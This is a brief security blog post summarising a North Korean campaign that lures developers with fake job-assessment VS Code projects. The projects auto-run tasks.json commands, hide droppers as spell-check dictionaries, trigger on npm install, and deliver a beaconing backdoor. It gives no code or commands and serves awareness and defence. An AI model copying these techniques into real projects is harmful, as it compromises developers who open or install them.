top of page

North Korean Hackers Exploit Developers' Trust in Visual Studio Code

  • Jan 21
  • 2 min read

Key Findings


  • North Korean threat actors associated with the "Contagious Interview" campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.

  • The attack involves instructing targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.

  • The malicious VS Code task configuration files are used to execute payloads, including a backdoor implant that provides remote code execution capabilities.

  • Sophisticated multi-stage droppers have been found hidden in the task configuration files, disguised as harmless spell-check dictionaries.

  • The campaign has evolved to use a previously undocumented infection method that leverages the Node.js ecosystem to deploy a highly capable backdoor.

  • The malware has features such as beaconing to a command-and-control server every 5 seconds, executing additional JavaScript, and cleaning up traces of its activity.

  • The code shows signs of being generated with the help of AI tools, with inline comments and phrasing consistent with AI-assisted development.


Background


The North Korean threat actors behind the long-running "Contagious Interview" campaign have been targeting software engineers, particularly those working in the cryptocurrency, blockchain, and fintech sectors, as they often have privileged access to financial assets, digital wallets, and technical infrastructure.


Malicious VS Code Projects


The latest attacks involve using malicious VS Code projects as lures to deliver a backdoor on compromised endpoints. The infection chain starts when the victim clones and opens a malicious Git repository in VS Code. The application then automatically processes the repository's `tasks.json` configuration file, leading to the execution of embedded arbitrary commands on the system.


Sophisticated Droppers


Subsequent iterations of the campaign have been found to conceal sophisticated multi-stage droppers in the task configuration files, disguising the malware as harmless spell-check dictionaries. The obfuscated JavaScript embedded in these files is executed as soon as the victim opens the project in the IDE.


Node.js Infection Method


Researchers have also identified a previously undocumented infection method that takes advantage of the Node.js ecosystem. This technique involves the deployment of malicious code that is triggered when a developer runs the standard `npm install` command.


Highly Capable Backdoor


The final-stage payload delivered in these attacks is a highly capable backdoor that beacons to a command-and-control server every 5 seconds, sending system details and waiting for instructions. It can execute additional JavaScript and even shut itself and child processes down on command, while cleaning up traces of its activity.


AI-Assisted Code


Interestingly, the code of the malware shows signs of being generated with the help of AI tools, with inline comments and phrasing that appear to be consistent with AI-assisted development.


Sources


  • https://thehackernews.com/2026/01/north-korea-linked-hackers-target.html

  • https://securityonline.info/contagious-code-north-korean-hackers-infiltrate-developer-workflows-via-visual-studio-code/

  • https://www.abit.ee/en/cybersecurity/hackers-and-attacks/north-korea-hackers-vs-code-developers-contagious-interview-beavertail-invisibleferret-cybersecurity-en

  • https://fridaysecurity.org/news/north-korea-linked-hackers-target-developers-via-malicious-vs-code-projects

  • https://phemex.com/news/article/north-korean-hackers-developer-attack-method-traced-back-to-github-repository-54881

  • https://x.com/TheHackersNews/status/2013683371474387188

Recent Posts

See All
Defeating AI with AI

Key Findings Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks. One capability that AI improves for threat actors is the ability to profil

 
 
 

Comments


  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page